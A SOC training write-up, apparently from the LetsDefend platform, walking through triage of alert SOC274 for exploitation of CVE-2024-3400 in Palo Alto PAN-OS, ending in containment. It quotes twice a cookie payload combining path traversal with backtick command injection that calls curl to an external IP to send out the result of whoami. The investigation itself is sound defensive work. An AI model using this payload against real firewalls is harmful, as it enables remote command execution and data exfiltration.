LetsDefend: SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)
Upon examining source IP of 144[.]172[.]79[.]92, we see that it is flagged as malicious. As the malicious IP is the source and destination is the company private IP, we can identify that this is malicious ingress traffic. As the cookie looks like this. SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)` We can label this as malicious command injection traffic. As the hostname of the machine is PA-Firewall-01, we can check for any emails for a potential pentesting engagement happening. We do see that one result is returned upon searching firewall, but the IP address is not relavant to us. Upon searching the raw logs, we get something back. Upon examining the logs, we see that the HTTP communication between the server with the malicious IP are all HTTP response code of 200. The endpoint login.esp specifically has content length of 11364. As we can see, the one and only login.esp endpoint log is the one where the cookie is modified for command execution, indicating a success exploitation. We can then contain the compromised host. We can then add our artifacts like so.

Upon examining source IP of 144[.]172[.]79[.]92
, we see that it is flagged as malicious.
As the malicious IP is the source and destination is the company private IP, we can identify that this is malicious ingress traffic.
As the cookie looks like this.
SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)`
We can label this as malicious command injection traffic.
As the hostname of the machine is PA-Firewall-01
, we can check for any emails for a potential pentesting engagement happening.
We do see that one result is returned upon searching firewall
, but the IP address is not relavant to us.
Upon searching the raw logs, we get something back.
Upon examining the logs, we see that the HTTP communication between the server with the malicious IP are all HTTP response code of 200.
The endpoint login.esp
specifically has content length of 11364.
As we can see, the one and only login.esp
endpoint log is the one where the cookie is modified for command execution, indicating a success exploitation.
We can then contain the compromised host.
We can then add our artifacts like so.